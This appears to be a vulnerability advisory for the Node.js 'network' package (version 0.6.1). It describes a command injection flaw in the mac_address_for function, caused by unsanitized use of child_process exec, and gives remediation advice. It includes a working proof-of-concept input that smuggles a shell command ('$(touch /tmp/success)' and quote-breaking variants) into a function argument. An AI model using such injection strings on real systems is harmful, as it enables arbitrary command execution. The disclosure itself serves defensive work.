Cross platform network utilities for Node.js (gateway_ip, MAC address, etc)
Affected versions of this package are vulnerable to arbitrary command injection (CWE-77 [1]).
If (attacker-controlled) user input is given to the mac_address_for
function of the package, it is possible for an attacker to execute arbitrary commands on the operating system that this package is being run on.
This vulnerability is due to use of the child_process
exec
function without input sanitization. The Node.js API documentation states that unsanitized user input should never be passed to exec
[2].
[1] https://cwe.mitre.org/data/definitions/77.html
[2] https://nodejs.org/api/child_process.html#child_process_child_process_exec_command_options_callback
The proof-of-concept code below illustrates the issue. Executing this code will cause the command touch /tmp/success
to be executed, leading to the creation of a file called success
in the /tmp
directory.
var PUT = require('network');
var x0 = " $(touch /tmp/success) # \" || touch /tmp/success # ' || touch /tmp/success";
var x1 = "{}";
new PUT["mac_address_for"](x0,x1);
Environment: Node.js v15.5.0 on Linux
Steps to reproduce:
npm i network@0.6.1
- Create a file,
poc.js
, containing the PoC code. - Execute the file:
node poc.js
A file called success
will be created in the tmp
directory as a result of the execution of the PoC.
- Consider using
execFile
[1] orexecFileSync
[2] if possible, which do not spawn a shell. - If possible, consider only passing inputs to
exec
that match a predefined allow-list. - If using an allow-list is not possible, consider sanitizing inputs to
exec
such that they do not contain shell meta-characters such as$()
.